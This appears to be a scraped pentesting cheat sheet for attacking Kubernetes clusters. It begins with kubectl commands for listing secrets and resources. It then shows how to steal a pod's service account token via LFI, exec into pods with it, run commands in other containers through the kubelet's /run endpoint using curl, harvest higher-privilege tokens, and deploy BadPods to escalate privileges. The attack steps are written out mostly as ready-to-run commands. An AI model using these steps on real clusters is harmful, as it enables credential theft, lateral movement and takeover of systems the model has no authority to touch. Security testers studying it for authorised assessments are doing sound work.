2.1 KiB
2.1 KiB
Kubectl
- Get pods,
-Afor all namespaces
kubectl get pods -A
- Check mounted secret
kubectl auth can-i --list
kubectl get secrets
kubectl get nodes
kubectl get deployments
kubectl get services
kubectl get ingress
kubectl get jobs
- Intel about a secret, and output
kubectl describe secrets <secret>
kubectl get secret <secret> -o json
kubectl describe secrets <secret> -o 'json'
Abuse Token
- Inside a pod the service token(jwt) can be found under
/var/run/secrets/kubernetes.io/serviceaccount/token - By change of an LFI extract the token and
kubectl auth can-i --list --token=$TOKEN
kubectl get pods --token=$TOKEN
kubectl exec -it <pod name> --token=$TOKEN -- /bin/sh
- Do not copy the token around, it will end in a carfuffle of some truncated string most of the time. Just do it in the following way and spare the pain for another day
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
Elevate Permissions with found token
- If a token has been found but its permissions on other containers can not be used through kubectl directly, use curl
curl -k -H "Authorization: Bearer $TOKEN" --data "cmd=id" https://$K8_IP:10250/run/$NAMESPACE/$POD/$CONTAINER
* Find namespace and pods
kubectl get pods -A
* Find name of container inside the pod description under `ContainerStatuses/name`
kubectl get pod $POD -n $NAMESPACE -o yaml
- Interesting find in any high priv container are
/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/ca.crt
- Enumerate again with the new found token
kubectl auth can-i --list
Create Pods
- Use BishopFox's BadPods
- If there is no internet connection add
imagePullPolicy: IfNotPresentto the YAML file
kubectl apply -f pod.yml --token=$TOKEN
- Start Pod
kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash
Start Pods
kubectl exec -it <podname> -n <namespace> -- /bin/bash